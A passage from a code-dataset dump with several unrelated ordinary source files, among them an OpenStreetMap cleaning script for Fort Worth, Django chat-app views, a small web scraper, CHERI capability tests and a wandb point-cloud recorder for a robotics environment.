\\t\\r\\n]')\n\ndef key_type(element, keys):\n if element.tag == \"tag\":\n key = element.attrib[\"k\"]\n if lower.search(key):\n keys['lower'] += 1\n ### \n elif lower_colon.search(key):\n keys['lower_colon'] += 1\n ###\n elif problemchars.search(key):\n keys[\"problemchars\"] += 1\n ###\n else:\n keys['other'] += 1\n ###\n return keys\n\n\n\n\ndef process_map(filename):\n keys = {\"lower\": 0, \"lower_colon\": 0, \"problemchars\": 0, \"other\": 0}\n for _, element in ET.iterparse(filename):\n keys = key_type(element, keys)\n\n return keys\n\n\n\ndef test():\n # You can use another testfile 'map.osm' to look at your solution\n # Note that the assertion below will be incorrect then.\n # Note as well that the test function here is only used in the Test Run;\n # when you submit, your code will be checked against a different dataset.\n keys = process_map(filename)\n pprint.pprint(keys)\n assert keys == {'lower': 48048, 'lower_colon': 85236, 'other': 708, 'problemchars': 0}\n\n\nif __name__ == \"__main__\":\n test()\n\n\n# In[22]:\n\n#Street Types Auditing \n\n\nstreet_type_re = re.compile(r'\\S+\\.?$', re.IGNORECASE)\nstreet_types = defaultdict(int)\n\ndef audit_street_type(street_types, street_name):\n m = street_type_re.search(street_name)\n if m:\n street_type = m.group()\n street_types[street_type] += 1\n\ndef print_sorted_dict(d):\n keys = d.keys()\n keys = sorted(keys, key=lambda s: s.lower())\n for k in keys:\n v = d[k]\n print(\"%s: %d\" % (k, v))\n #Finding the street abbreviations \ndef is_street_name(elem):\n return (elem.tag == \"tag\") and (elem.attrib['k'] == \"addr:street\")\n\n \ndef audit():\n for event, elem in ET.iterparse(filename):\n if is_street_name(elem):\n audit_street_type(street_types, elem.attrib['v']) \n print_sorted_dict(street_types) \n\n\nif __name__ == '__main__':\n audit()\n\n\n# In[23]:\n\nOSMFILE = \"FTWORTH.xml\"\nstreet_type_re = re.compile(r'\\b\\S+\\.?$', re.IGNORECASE)\n\n#Words included that did not need corrections\nexpected = [\"Street\", \"Avenue\", \"Boulevard\", \"Drive\", \"Court\", \"Place\", \"Square\", \"Lane\", \"Road\", \n \"Trail\", \"Parkway\", \"Commons\", \"Terrace\", \"West\",\"Way\",\"South\", \"Run\",\"Plaza\", \"North\",\n \"Levee\",\"Highway\", \"Gipson\", \"Freeway\", \"East\", \"Drive\", \"Circle\",\"A\",\"B\",\"C\",\"D\",\"E\",\"G\",\n \"H\",\"I\", \"J\", \"K\", \"L\", \"M\", \"N\", \"O\", \"P\", \"201\"]\n\n# Abbreviations that need to be fixed \nmapping = { \"St\": \"Street\",\n \"Ave\" : \"Avenue\",\n \"Blvd\": \"Boulevard\",\n \"Dr\" : \"Drive\"\n }\n\ndef audit_street_type(street_types, street_name):\n m = street_type_re.search(street_name)\n if m:\n street_type = m.group()\n if street_type not in expected:\n street_types[street_type].add(street_name)\n\n\ndef is_street_name(elem):\n return (elem.attrib['k'] == \"addr:street\")\n\n\ndef audit(osmfile):\n osm_file = open(osmfile, \"r\", encoding='utf-8')\n street_types = defaultdict(set)\n for event, elem in ET.iterparse(osm_file, events=(\"start\",)):\n\n if elem.tag == \"node\" or elem.tag == \"way\":\n for tag in elem.iter(\"tag\"):\n if is_street_name(tag):\n audit_street_type(street_types, tag.attrib['v'])\n osm_file.close()\n return street_types\n\n# updating the abbreviations \ndef update_name(name, mapping):\n m = street_type_re.search(name)\n if m:\n street_type = m.group()\n better_type = street_type\n for problem_type in mapping:\n if street_type == problem_type:\n better_type = mapping[problem_type]\n \n better_name = name.replace(street_type, better_type)\n 
return better_name\n \n\n \n\n return name\n\ndef st_test():\n st_types = audit(OSMFILE)\n\n pprint.pprint(dict(st_types))\n\n for st_type, ways in st_types.items():\n for name in ways:\n better_name = update_name(name, mapping)\n print(name, \"=>\", better_name)\n \nif __name__ == '__main__':\n st_test()\n\n\n# In[35]:\n\n\n\n#Auditing the Cuisine Type\ncuisine_type_re = re.compile(r'\\S+\\.?$',re.IGNORECASE)\ncuisine_types = defaultdict(int)\n\ndef audit_cuisine_type(cuisine_types, cuisine_name):\n m = cuisine_type_re.search(cuisine_name)\n if m:\n cuisine_type = m.group()\n cuisine_types[cuisine_type] += 1\n \n \n #Finding all the differnt categories for Cusine \ndef is_cuisine_name(elem):\n return (elem.tag == \"tag\") and (elem.attrib['k'] == \"cuisine\")\n \n\ndef audit_cuisine():\n for event, elem in ET.iterparse(filename):\n if is_cuisine_name(elem):\n audit_cuisine_type(cuisine_types, elem.attrib['v']) \n print_sorted_dict(cuisine_types) \n\n\nif __name__ == '__main__':\n audit_cuisine()\n \n\n\n# ## Deleting Coffee_Shop as a Cuisine\n\n# In[37]:\n\n#Words included that did not need corrections\nexpected = [\"american\", \"barbecue\", \"burger\", \"chicken\", \"italian\", \"mexican\", \"mixed\", \"sandwich\",\"steak_house\"] \n# Incorrect Cuisine that needs to be deleted \nmapping = { \"coffee_shop\": \" \"}\n\n\n\n\ndef audit_cuisine_type(cuisine_types, cuisine_name):\n n = cuisine_type_re.search(cuisine_name)\n if n:\n cuisine_type = n.group()\n if cuisine_type not in expected:\n cuisine_types[cuisine_type].add(cuisine_name)\n\n\ndef is_cuisine_name(elem):\n return (elem.attrib['k'] == \"cuisine\")\n\n\ndef audit_cuisine(osmfile):\n osm_file = open(osmfile, \"r\", encoding='utf-8')\n cuisine_types = defaultdict(set)\n for event, elem in ET.iterparse(osm_file, events=(\"start\",)):\n\n if elem.tag == \"node\" or elem.tag == \"way\":\n for tag in elem.iter(\"tag\"):\n if is_cuisine_name(tag):\n audit_cuisine_type(cuisine_types, tag.attrib['v'])\n osm_file.close()\n return cuisine_types\n\n# updating the abbreviations \ndef update_cuisine_name(cuisine_name, mapping):\n n = cuisine_type_re.search(cuisine_name)\n if n:\n cuisine_type = n.group()\n better_cuisine_type = cuisine_type\n for problem_cuisine_type in mapping:\n if cuisine_type == problem_cuisine_type:\n better_cuisine_type = mapping[problem_cuisine_type]\n \n better_cuisine_name = cuisine_name.replace(cuisine_type, better_cuisine_type)\n return better_cuisine_name\n \n\n \n\n return cuisine_name\n\ndef cuisine_test():\n cuisine_types = audit_cuisine(OSMFILE)\n\n pprint.pprint(dict(cuisine_types))\n\n for cuisine_type, ways in cuisine_types.items():\n for cuisine_name in ways:\n better_cuisine_name = update_cuisine_name(cuisine_name, mapping)\n print(cuisine_name, \"=>\", better_cuisine_name)\n \nif __name__ == '__main__':\n cuisine_test()\n\n\n\n\n# In[38]:\n\n#Auditing for Further Improvements with Parking lots\namenity_type_re = re.compile(r'\\S+\\.?$', re.IGNORECASE)\namenity_types = defaultdict(int)\n\ndef audit_amenity_type(amenity_types, amenity_name):\n m = amenity_type_re.search(amenity_name)\n if m:\n amenity_type = m.group()\n amenity_types[amenity_type] += 1\n \n \n#Finding the different Amenity types: \ndef is_amenity_name(elem):\n return (elem.tag == \"tag\") and (elem.attrib['k'] == \"amenity\")\n \n\ndef audit_amenity():\n for event, elem in ET.iterparse(filename):\n if is_amenity_name(elem):\n audit_amenity_type(amenity_types, elem.attrib['v']) \n print_sorted_dict(amenity_types) \n\n\nif __name__ == 
'__main__':\n audit_amenity()\n \n \n\n\n# In[ ]:\n\n#Database Setup \nimport csv\nimport codecs\nimport pprint\nimport re\nimport xml.etree.cElementTree as ET\n\nimport cerberus\n\nimport schema\n\nOSM_PATH = \"FTWORTH.xml\"\n\nNODES_PATH = \"nodes.csv\"\nNODE_TAGS_PATH = \"nodes_tags.csv\"\nWAYS_PATH = \"ways.csv\"\nWAY_NODES_PATH = \"ways_nodes.csv\"\nWAY_TAGS_PATH = \"ways_tags.csv\"\n\nLOWER_COLON = re.compile(r'^([a-z]|_)+:([a-z]|_)+')\nPROBLEMCHARS = re.compile(r'[=\\+/&<>;\\'\"\\?%#$@\\,\\. \\t\\r\\n]')\n\nSCHEMA = schema.schema\n\n# Make sure the fields order in the csvs matches the column order in the sql table schema\nNODE_FIELDS = ['id', 'lat', 'lon', 'user', 'uid', 'version', 'changeset', 'timestamp']\nNODE_TAGS_FIELDS = ['id', 'key', 'value', 'type']\nWAY_FIELDS = ['id', 'user', 'uid', 'version', 'changeset', 'timestamp']\nWAY_TAGS_FIELDS = ['id', 'key', 'value', 'type']\nWAY_NODES_FIELDS = ['id', 'node_id', 'position']\n\n\ndef load_new_tag(element, secondary, default_tag_type):\n \"\"\"\n Load a new tag dict to go into the list of dicts for way_tags, node_tags\n \"\"\"\n new = {}\n new['id'] = element.attrib['id']\n if \":\" not in secondary.attrib['k']:\n new['key'] = secondary.attrib['k']\n new['type'] = default_tag_type\n else:\n post_colon = secondary.attrib['k'].index(\":\") + 1\n new['key'] = secondary.attrib['k'][post_colon:]\n new['type'] = secondary.attrib['k'][:post_colon - 1]\n new['value'] = secondary.attrib['v']\n #print \"!23123\"\n #print secondary.attrib['v']\n #print\"!2312\"\n return new\n\n\ndef shape_element(element, node_attr_fields=NODE_FIELDS, way_attr_fields=WAY_FIELDS,\n problem_chars=PROBLEMCHARS, default_tag_type='regular'):\n \"\"\"Clean and shape node or way XML element to Python dict\"\"\"\n\n node_attribs = {}\n way_attribs = {}\n way_nodes = []\n tags = [] # Handle secondary tags the same way for both node and way elements\n\n if element.tag == 'node':\n for attrib, value in element.attrib.items():\n if attrib in node_attr_fields:\n node_attribs[attrib] = value\n \n # for elements within the top element\n for secondary in element.iter():\n if secondary.tag == 'tag':\n if problem_chars.match(secondary.attrib['k']) is not None:\n continue\n else:\n new = load_new_tag(element, secondary, default_tag_type)\n tags.append(new)\n return {'node': node_attribs, 'node_tags': tags}\n elif element.tag == 'way':\n for attrib, value in element.attrib.items():\n if attrib in way_attr_fields:\n way_attribs[attrib] = value\n \n counter = 0\n for secondary in element.iter():\n if secondary.tag == 'tag':\n if problem_chars.match(secondary.attrib['k']) is None:\n \n \n new = load_new_tag(element, secondary, default_tag_type)\n tags.append(new)\n if secondary.tag == 'nd':\n newnd = {}\n newnd['id'] = element.attrib['id']\n newnd['node_id'] = secondary.attrib['ref']\n newnd['position'] = counter\n counter += 1\n way_nodes.append(newnd)\n \n # print {'way': way_attribs, 'way_nodes': way_nodes, 'way_tags': tags}\n return {'way': way_attribs, 'way_nodes': way_nodes, 'way_tags': tags}\n\n\n# ================================================== #\n# Helper Functions #\n# ================================================== #\ndef get_element(osm_file, tags=('node', 'way', 'relation')):\n \"\"\"Yield element if it is the right type of tag\"\"\"\n\n context = ET.iterparse(osm_file, events=('start', 'end'))\n _, root = next(context)\n for event, elem in context:\n if event == 'end' and elem.tag in tags:\n yield elem\n root.clear()\n\n\ndef validate_element(element, validator, 
schema=SCHEMA):\n    \"\"\"Raise ValidationError if element does not match schema\"\"\"\n    if validator.validate(element, schema) is not True:\n        # fix: dict.iteritems() is Python 2 only; this file otherwise targets Python 3\n        field, errors = next(iter(validator.errors.items()))\n        message_string = \"\\nElement of type '{0}' has the following errors:\\n{1}\"\n        error_string = pprint.pformat(errors)\n        \n        raise Exception(message_string.format(field, error_string))\n\n\n\n# ================================================== #\n#               Main Function                        #\n# ================================================== #\ndef process_map(file_in, validate):\n    \"\"\"Iteratively process each XML element and write to csv(s)\"\"\"\n\n    with codecs.open(NODES_PATH, 'w', encoding=\"utf-8\") as nodes_file, codecs.open(NODE_TAGS_PATH, 'w', encoding=\"utf-8\") as nodes_tags_file, codecs.open(WAYS_PATH, 'w',encoding=\"utf-8\") as ways_file, codecs.open(WAY_NODES_PATH, 'w',encoding=\"utf-8\") as way_nodes_file, codecs.open(WAY_TAGS_PATH, 'w', encoding=\"utf-8\") as way_tags_file:\n\n        nodes_writer = csv.DictWriter(nodes_file, NODE_FIELDS)\n        node_tags_writer = csv.DictWriter(nodes_tags_file, NODE_TAGS_FIELDS)\n        ways_writer = csv.DictWriter(ways_file, WAY_FIELDS)\n        way_nodes_writer = csv.DictWriter(way_nodes_file, WAY_NODES_FIELDS)\n        way_tags_writer = csv.DictWriter(way_tags_file, WAY_TAGS_FIELDS)\n\n        nodes_writer.writeheader()\n        node_tags_writer.writeheader()\n        ways_writer.writeheader()\n        way_nodes_writer.writeheader()\n        way_tags_writer.writeheader()\n\n        validator = cerberus.Validator()\n\n        for element in get_element(file_in, tags=('node', 'way')):\n            el = shape_element(element)\n            if el:\n#                if validate is True:\n#                    validate_element(el, validator)\n\n                if element.tag == 'node':\n                    nodes_writer.writerow(el['node'])\n                    node_tags_writer.writerows(el['node_tags'])\n                elif element.tag == 'way':\n                    ways_writer.writerow(el['way'])\n                    way_nodes_writer.writerows(el['way_nodes'])\n                    way_tags_writer.writerows(el['way_tags'])\n\n\nif __name__ == '__main__':\n    # Note: Validation is ~ 10X slower. 
For the project consider using a small\n # sample of the map when validating.\n process_map(OSM_PATH, validate=True)\n\n","repo_name":"txunt2010/Udacity-Open-Street-Map","sub_path":"Ft.+Worth+Open+Street+Map.py","file_name":"Ft.+Worth+Open+Street+Map.py","file_ext":"py","file_size_in_byte":15038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30432123721","text":"from django.shortcuts import redirect, render\nfrom django.views.generic import TemplateView\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.urls import reverse_lazy\nfrom django.views.generic.edit import CreateView\nfrom .forms import CustomSignupForm\nfrom django.contrib.auth.views import LoginView,LogoutView\nfrom .forms import LoginForm,ChatForm,UserNameChangeForm,EmailChangeForm,ImageChangeForm\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom .models import CustomUser\nfrom django.views.generic import DetailView\nfrom django.views.generic import FormView\nfrom .models import Message\nfrom django import forms\nfrom django.http import HttpRequest\nfrom django.contrib.auth.views import PasswordChangeView, PasswordChangeDoneView\n\n\ndef index(request):\n return render(request, \"myapp/index.html\")\n\ndef signup_view(request):\n return render(request, \"myapp/signup.html\")\n\ndef login_view(request):\n return render(request, \"myapp/login.html\")\n\ndef friends(request):\n return render(request, \"myapp/friends.html\")\n\ndef talk_room(request):\n return render(request, \"myapp/talk_room.html\")\n\ndef setting(request):\n return render(request, \"myapp/setting.html\")\n\ndef logout(request):\n return render(request, \"myapp/logout.html\")\n\nclass UserCreateView(CreateView):\n template_name = 'myapp/signup.html'\n form_class = CustomSignupForm\n success_url = reverse_lazy('index')\n\nclass Login(LoginView):\n template_name = 'myapp/login.html'\n form_class = LoginForm\n\ndef Friends(request):\n template_name = \"myapp/friends.html\"\n ctx = {}\n qs = CustomUser.objects.all()\n ctx[\"object_list\"] = qs\n\n return render(request, template_name, ctx)\n\nclass UserDetailView(DetailView):\n template_name = 'myapp/detail.html'\n model = CustomUser\n\ndef lists(request,pk):\n message_list = Message.objects.all()\n form = ChatForm(request.POST or None)\n id = pk\n room_name = CustomUser.objects.get(pk=id)\n user_name = request.user\n context = {\n 'message_list':message_list,\n 'form':form,\n 'room_name':room_name,\n }\n if request.method == 'POST':\n if form.is_valid():\n\n # create()の場合\n Message.objects.create(\n message=form.cleaned_data['message'],\n sent_by=request.user,\n sent_to=CustomUser.objects.get(pk=id)\n )\n\n return render(request, 'myapp/detail.html', context)\n return render(request, 'myapp/detail.html', context)\n\n #送信者と送信相手を自動入力する。\n\nclass Logout(LogoutView):\n template_name = 'myapp/logout.html'\n\nclass PasswordChange(LoginRequiredMixin, PasswordChangeView):\n \"\"\"パスワード変更ビュー\"\"\"\n success_url = reverse_lazy('change_done')\n template_name = 'myapp/password_change.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs) # 継承元のメソッドCALL\n context[\"form_name\"] = \"password_change\"\n return context\n\nclass ChangeDone(LoginRequiredMixin,PasswordChangeDoneView):\n \"\"\"パスワード変更完了\"\"\"\n template_name = 'myapp/change_done.html'\n\nclass UserNameChangeView(LoginRequiredMixin, FormView):\n template_name = 'myapp/change.html'\n form_class = UserNameChangeForm\n success_url = 
reverse_lazy('change_done')\n \n def form_valid(self, form):\n #formのupdateメソッドにログインユーザーを渡して更新\n form.update(user=self.request.user)\n return super().form_valid(form)\n\n def get_form_kwargs(self):\n kwargs = super().get_form_kwargs()\n # 更新前のユーザー情報をkwargsとして渡す\n kwargs.update({\n 'username' : self.request.user.username,\n })\n return kwargs\n\nclass EmailChangeView(LoginRequiredMixin, FormView):\n template_name = 'myapp/change.html'\n form_class = EmailChangeForm\n success_url = reverse_lazy('change_done')\n \n def form_valid(self, form):\n #formのupdateメソッドにログインユーザーを渡して更新\n form.update(user=self.request.user)\n return super().form_valid(form)\n\n def get_form_kwargs(self):\n kwargs = super().get_form_kwargs()\n # 更新前のユーザー情報をkwargsとして渡す\n kwargs.update({\n 'email' : self.request.user.email,\n })\n return kwargs\n\nclass ImageChangeView(LoginRequiredMixin, FormView):\n template_name = 'myapp/change.html'\n form_class = ImageChangeForm\n success_url = reverse_lazy('change_done')\n \n def form_valid(self, form):\n #formのupdateメソッドにログインユーザーを渡して更新\n form.update(user=self.request.user)\n return super().form_valid(form)\n\n def get_form_kwargs(self):\n kwargs = super().get_form_kwargs()\n # 更新前のユーザー情報をkwargsとして渡す\n kwargs.update({\n 'image' : self.request.user.image,\n })\n return kwargs","repo_name":"65th-NFO-WebSiteTeam/forsteri","sub_path":"forsteri-back/.sample/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16292773655","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri May 15 16:34:12 2020\r\n\r\n@author: 81552\r\n\"\"\"\r\n\r\nimport requests\r\nimport re\r\nfrom bs4 import BeautifulSoup\r\nfilename='糗事百科.txt'\r\nmf=list()\r\n\r\nurl='https://www.qiushibaike.com/text/'\r\nfor i in range(1,7):\r\n if i>1:\r\n url='https://www.qiushibaike.com/text/page/'+str(i)+'/'\r\n r=requests.get(url)\r\n demo = r.text\r\n soup = BeautifulSoup(demo,\"html.parser\")\r\n soup.prettify()\r\n space = [s.extract() for s in soup('br')]\r\n s=str(soup.find_all('div', class_=\"content\")).replace('\\n', '').replace('\\r', '')\r\n m = re.findall(re.compile('(.*?)'),s) \r\n with open(filename,'a',encoding='utf-8') as f:\r\n for joke in m:\r\n print(joke,file=f)\r\n\r\n\r\n \r\n \r\n","repo_name":"JoeyXHY/python-adventures","sub_path":"5页糗事百科.py","file_name":"5页糗事百科.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26438428766","text":"from beritest_tools import BaseBERITestCase\nfrom nose.plugins.attrib import attr\n\n#\n# Test a ccall_fast\n#\n\nclass test_cp2_ccall_fast(BaseBERITestCase):\n\n @attr('capabilities')\n @attr('ccall_hw_2')\n def test_cp2_ccall_fast_1(self):\n '''Test that ccall_fast called the sandbox and returned'''\n self.assertRegisterEqual(self.MIPS.a1, 0x900d,\n \"ccall did not call the sandbox and come back\")\n\n @attr('capabilities')\n @attr('ccall_hw_2')\n def test_cp2_ccall_fast_2(self):\n '''Test that the sandbox inverted the memory array'''\n self.assertRegisterEqual(self.MIPS.a2, 0x08,\n \"the sandbox did not invert the memory array\")\n\n @attr('capabilities')\n @attr('ccall_hw_2')\n def test_cp2_ccall_fast_3(self):\n '''Test that the sandbox zeroed the second memory array'''\n self.assertRegisterEqual(self.MIPS.a3, 0x00,\n \"the sandbox did not zero the second memory array\")\n\n @attr('capabilities')\n @attr('ccall_hw_2')\n def 
test_cp2_ccall_fast_4(self):\n '''Test that returning from the sandbox cleared $a4'''\n self.assertRegisterEqual(self.MIPS.a4, 0x00,\n \"returning from the sandbox did not clear $a4\")\n\n @attr('capabilities')\n @attr('ccall_hw_2')\n def test_cp2_ccall_fast_5(self):\n '''Test that the sandbox zeroed the second memory array from $a4'''\n self.assertRegisterEqual(self.MIPS.a5, 0x00,\n \"the sandbox did not zero the second memory array from $a4\")\n","repo_name":"CTSRD-CHERI/beri","sub_path":"cheritest/trunk/tests/cp2/test_cp2_ccall_fast.py","file_name":"test_cp2_ccall_fast.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"21"} +{"seq_id":"26746613991","text":"\"\"\"\nTODO:\n- Make a unified plotly plotting function\n- Show more than one env?\n\"\"\"\n\nimport os, sys\n\nimport numpy as np\nimport imageio\nimport pickle\nimport gym\n\n# from bin_env import PokeEnv\nfrom hacman.utils.transformations import to_pose_mat, transform_point_cloud, decompose_pose_mat\n\nimport wandb\nfrom stable_baselines3.common.vec_env.base_vec_env import VecEnv, VecEnvObs, VecEnvStepReturn, VecEnvWrapper\nfrom stable_baselines3.common.vec_env.dummy_vec_env import DummyVecEnv\nfrom stable_baselines3.common.vec_env.subproc_vec_env import SubprocVecEnv, _flatten_obs\nfrom hacman.utils.plotly_utils import plot_pcd, plot_action, plot_pcd_with_score\n# from bin_env.util import angle_diff\nimport plotly.graph_objects as go\nfrom typing import Any, Callable, List, Optional, Sequence, Tuple, Type, Union, Dict\nfrom hacman.algos.location_policy import RandomLocation\n\n \nclass WandbPointCloudRecorder(VecEnvWrapper):\n \"\"\"\n Modified based on VecVideoRecorder.\n \"\"\"\n\n def __init__(self, venv, global_step_counter=None,\n save_plotly=False, foldername=None, \n record_video=False, upload_video=False,\n real_robot=False, log_plotly_once=True):\n\n VecEnvWrapper.__init__(self, venv)\n self.real_robot = real_robot\n # Log plotly once per evaluate_policy call. This is to save space during training.\n self.log_plotly_once = log_plotly_once\n self.env = venv\n # Temp variable to retrieve metadata\n temp_env = venv\n\n # Unwrap to retrieve metadata dict\n # that will be used by gym recorder\n while isinstance(temp_env, VecEnvWrapper):\n temp_env = temp_env.venv\n\n if isinstance(temp_env, DummyVecEnv) or isinstance(temp_env, SubprocVecEnv):\n metadata = temp_env.get_attr(\"metadata\")[0]\n else:\n metadata = temp_env.metadata\n\n self.episode_count = -1\n self.global_step_counter = global_step_counter\n\n self.env.metadata = metadata\n self.save_plotly = save_plotly\n assert not (foldername is None and self.save_plotly), \"Need to specify a folder for WandbPointCloudRecorder.\"\n self.foldername = os.path.join(foldername, 'plotly')\n os.makedirs(self.foldername, exist_ok=True)\n\n self.vis = []\n self.recording = False\n self.title = None\n self.step_count = 0\n self.plot_count = 0\n\n # Video recording\n self.vid_count = 0\n self.record_video = record_video\n self.upload_video = upload_video\n self.vid_dir = os.path.join(foldername, 'video')\n self.cam_frames = []\n\n def reset(self) -> VecEnvObs:\n # This reset will only be called once per evaluate_policy\n # regardless of how many eval epsiodes. 
This is because\n # VecEnv will reset themselves.\n obs = self.venv.reset()\n self.reset_plotly_logging(obs)\n self.reset_video_recording()\n return obs\n \n def reset_video_recording(self):\n if len(self.cam_frames) == 0:\n return\n\n for i in range(len(self.cam_frames)):\n if len(self.cam_frames[i]) == 0:\n continue\n global_step = self.get_global_step()\n is_success = \"fail\"\n filename = f\"video_{self.vid_count}_{global_step}_{i}_{is_success}.mp4\"\n self.save_video(self.cam_frames[i], filename)\n self.cam_frames[i].clear()\n\n def reset_plotly_logging(self, obs):\n self.recording = True\n self.vis = []\n self.title = None \n self.step_count = 0\n self.episode_count += 1\n self.vis.append(plot_pcd('background', obs['background_pcd_points'][0], 'lightgrey', size=2))\n\n if self.real_robot:\n # Ground truth goal pcd\n goal_pcd = self.venv.envs[0].unwrapped.env.goal_pcd.voxel_down_sample(0.01)\n goal_pcd = np.asarray(goal_pcd.points)\n self.vis.append(plot_pcd(f'goal', goal_pcd, 'blue'))\n # Estimated goal pcd\n goal_pcd = transform_point_cloud(obs['object_pose'][0], obs['goal_pose'][0], obs['object_pcd_points'][0])\n self.vis.append(plot_pcd(f'g_0', goal_pcd, 'lightblue'))\n else:\n goal_pcd = transform_point_cloud(obs['object_pose'][0], obs['goal_pose'][0], obs['object_pcd_points'][0])\n self.vis.append(plot_pcd(f'g_0', goal_pcd, 'blue'))\n \n if 'action_location_score' in obs.keys():\n self.vis.append(plot_pcd_with_score(f'o_0', obs['object_pcd_points'][0], obs['action_location_score'][0]))\n else:\n self.vis.append(plot_pcd(f'o_0', obs['object_pcd_points'][0], 'yellow'))\n return\n \n def enable_video_recording(self):\n self.record_video = True\n \n def disable_video_recording(self):\n self.record_video = False\n\n def get_global_step(self):\n if self.global_step_counter is not None:\n global_step = self.global_step_counter()\n else:\n global_step = self.episode_count\n return global_step\n\n def step_wait(self) -> VecEnvStepReturn:\n obs, rews, dones, infos = self.venv.step_wait()\n \n if self.recording:\n self.title = f\"Final reward: {rews[0]:.2f} success: {infos[0]['is_success']}\"\n self.step_count += 1\n action_location = infos[0]['action_location'][0]\n\n if action_location is None:\n # When not predicting action location (contiguous action),\n # plot from previous gripper position\n if (not hasattr(self, \"prev_obs\")): # Issue with gym0.24 running one step before initialized\n action_location = np.zeros(3)\n elif self.prev_obs is None:\n action_location = np.zeros(3)\n else:\n prev_gripper_pose = self.prev_obs['gripper_pose']\n action_location, _ = decompose_pose_mat(prev_gripper_pose[0])\n \n if 'poke_success' in infos[0].keys() and not infos[0]['poke_success']:\n self.vis.append(plot_action(f'a_{self.step_count-1}', action_location, infos[0]['action_param'], color='orange'))\n else:\n self.vis.append(plot_action(f'a_{self.step_count-1}', action_location, infos[0]['action_param'])) \n \n if dones[0]:\n # DummyVecEnv will reset venv automatically and replace the returned obs\n obj_pcd = infos[0]['terminal_observation']['object_pcd_points'] \n self.vis.append(plot_pcd(f'o_final', obj_pcd, 'mediumpurple'))\n self.close_video_recorder()\n if not self.log_plotly_once:\n self.reset_plotly_logging(obs) \n else:\n if self.real_robot: # Estimated goal pcd\n goal_pcd = transform_point_cloud(obs['object_pose'][0], obs['goal_pose'][0], obs['object_pcd_points'][0])\n self.vis.append(plot_pcd(f'g_{self.step_count}', goal_pcd, 'lightblue'))\n else:\n goal_pcd = 
transform_point_cloud(obs['object_pose'][0], obs['goal_pose'][0], obs['object_pcd_points'][0])\n self.vis.append(plot_pcd(f'g_{self.step_count}', goal_pcd, 'blue'))\n \n if 'action_location_score' in obs.keys():\n self.vis.append(plot_pcd_with_score(f'o_{self.step_count}', obs['object_pcd_points'][0], obs['action_location_score'][0]))\n else:\n self.vis.append(plot_pcd(f'o_{self.step_count}', obs['object_pcd_points'][0], 'purple'))\n self.vis.append(plot_pcd(f'o_next_{self.step_count-1}', obs['object_pcd_points'][0], 'yellow'))\n \n # Camera recording\n if self.record_video and len(infos[0]['cam_frames']) > 0:\n if len(self.cam_frames) == 0:\n # Initialize cam_frames\n self.cam_frames = [[] for _ in range(len(infos))]\n \n # Append the poke frames to the corresponding cam_frames\n for i, info in enumerate(infos):\n if len(info['cam_frames']) > 0:\n self.cam_frames[i].extend(info['cam_frames'])\n\n if dones[i]:\n global_step = self.get_global_step()\n is_success = \"success\" if infos[i]['is_success'] else \"fail\"\n filename = f\"video_{self.vid_count}_{global_step}_{i}_{is_success}.mp4\"\n self.save_video(self.cam_frames[i], filename)\n self.cam_frames[i].clear()\n\n return obs, rews, dones, infos\n \n\n def save_video(self, frames, filename, fps=10) -> None:\n assert len(frames) > 0, \"No frames to save\"\n global_step = self.get_global_step()\n vid_path = os.path.join(self.vid_dir, filename)\n os.makedirs(self.vid_dir, exist_ok=True)\n\n # Save video locally\n with imageio.get_writer(vid_path, mode='I', fps=fps) as writer:\n for im in frames:\n im = np.flipud(im)\n writer.append_data(im)\n \n self.vid_count += 1\n\n if self.upload_video:\n wandb.log({\"video\": wandb.Video(vid_path, fps=fps, format=\"mp4\"), 'global_steps': global_step})\n \n return\n\n def close_video_recorder(self) -> None:\n if self.recording:\n global_step = self.get_global_step()\n # fig = self.get_plotly_with_slidebar()\n fig = self.get_plotly_with_slidebar()\n # fig.show() # Visualize locally\n wandb.log({\"visualizations\": fig, 'global_steps': global_step})\n\n if self.save_plotly:\n filename = f\"plotly_{global_step}_{self.plot_count}.html\"\n fig.write_html(os.path.join(self.foldername, filename), auto_play=False) # Save as html locally\n self.plot_count += 1\n\n self.recording = False\n self.vis = []\n self.title = None\n self.step_count = 0\n \n def get_plotly_with_slidebar(self):\n vis_name2id = {}\n for i in range(len(self.vis)):\n vis_name2id[self.vis[i].name] = i\n\n fig = go.Figure(self.vis)\n \n # Default\n for dt in fig.data:\n dt.visible = False\n fig.data[vis_name2id['background']].visible = True \n if f'goal' in vis_name2id.keys():\n fig.data[vis_name2id['goal']].visible = True \n fig.data[vis_name2id[f'g_0']].visible = True\n fig.data[vis_name2id[f'o_0']].visible = True\n fig.data[vis_name2id[f'a_0']].visible = True\n\n fig.update_scenes(aspectmode='data')\n fig.update_layout(title=self.title)\n\n steps = []\n for i in range(self.step_count):\n step = dict(\n method=\"update\",\n args=[{\"visible\": [False] * len(fig.data)},\n {\"title\": self.title}],\n )\n step[\"args\"][0][\"visible\"][vis_name2id['background']] = True\n if f'goal' in vis_name2id.keys():\n step[\"args\"][0][\"visible\"][vis_name2id['goal']] = True\n if f'g_{i}' in vis_name2id.keys():\n step[\"args\"][0][\"visible\"][vis_name2id[f'g_{i}']] = True \n step[\"args\"][0][\"visible\"][vis_name2id[f'o_{i}']] = True\n step[\"args\"][0][\"visible\"][vis_name2id[f'a_{i}']] = True\n if i == self.step_count - 1:\n 
